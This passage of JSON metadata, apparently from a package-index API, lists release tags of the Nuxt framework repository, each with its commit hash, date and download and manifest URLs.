ub.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sh